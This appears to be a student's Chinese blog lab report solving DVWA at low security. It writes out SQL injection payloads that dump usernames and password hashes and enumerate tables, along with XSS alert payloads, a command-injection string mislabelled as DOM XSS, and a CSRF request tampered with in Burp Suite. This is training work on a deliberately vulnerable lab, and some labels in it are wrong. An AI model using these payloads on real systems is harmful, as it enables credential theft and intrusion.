low难度下dvwa的通关

5.1SQL注入实验:

(1)判断是否存在sql注入,输入1',返回错误

图5.1.1判断存在sql注入:当输入1',返回错误,说明页面没有对1'进行过滤。

图5.1.1返回错误

图5.1.2输入1,回显正常,确认存在sql注入。

                                图5.1.2回显

(2)图5.1.3猜解SQL查询语句中的字段数

回显为2时显示正常,为3时返回错误,可以得知字段数是2

                                图5.1.3

3)图5.1.4确定回显位置(为第二个位置)

    1' union select 1,2#

                            图5.1.4

 (4)图5.1.5获取当前数据库。Dvwa

       1' union select 1,database()#

                                                        5.1.5

5)图5.1.6输入1’ union select user,password from users#获取用户和用户的密码,并将First

 Name改为自己的学号

                     图5.1.6

5.2.XSS实验:

1.反射型XSS:请同学们构造Payload代码,弹出自己的学号与姓名图5.2.1:

Xss语句为<script>alert(“ 10.29”)</script>

                                                                 图5.2.1

2.存储型XSS:请同学们尝试将Name改为自己的学号,并构造Payload,使弹窗内容为“学号 姓名 时间”图5.2.2

Xss语句为?default<script>alert(“ 10.29”)</script>

                                                                 图5.2.2

3.DOM型XSS:请同学们构造Payload,使弹窗内容为“学号 姓名“。图5.2.3

Xss语句为127.0.0.1 &echo ‘2100300825’

                                                                 图5.2.3

5.3完成CSRF实验,请同学们尝试通过CFSR,将密码改为自己的学号重复完成该实验,并截图记录过程。(要求页面输入内容为GUET,通过修改数据包将密码改为学号)

1.完成这个实验我们需要使用linux自带的工具burp suite,将浏览器代理设置为图5.3.1

                                                                 图5.3.1

2.在这个页面使用burp suite图5.3.2,使用后会出现图5.3.3

                                                                 图5.3.2

                                                                           图5.3.3

3.在此页面send 到reporter可修改上传的包内容,如图5.3.4

点击send后,将包上传到网站,如图5.3.5

                                                                           图5.3.4

                                                                           图5.3.5

六、 问题记录和实验总结

问题:sql注入中并没有提及users库名是怎么来的,实际可以通过

获取表名          1'  union select 1,group_concat(table_name) from information_schema.tables where 获取字段名 tables_schema=database()#

总结:

DVWA靶场提供了各种不同类型的漏洞,如SQL注入、跨站脚本(XSS)、文件包含等。我可以学习到如何发现这些漏洞,并利用它们来获取敏感信息或者执行未经授权的操作。通过实际操作,我可以更好地理解Web应用程序中存在的安全风险,并学会如何预防和弥补这些风险。这将帮助我提高对于安全问题的敏感度,并培养正确的安全意识。使用DVWA靶场可以提升你的渗透测试技能。我可以学会使用不同的工具和技术,如Burp Suite、Metasploit等,来评估Web应用程序的安全性,并提供合适的建议和解决方案。通过攻击DVWA靶场中的漏洞,我可以学会如何修复这些漏洞,加固Web应用程序的安全性,提高防御能力。总之,DVWA靶场是一个非常有用的学习工具,通过使用它,我可以深入了解Web应用程序的安全性,并提升相关的技能和知识。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值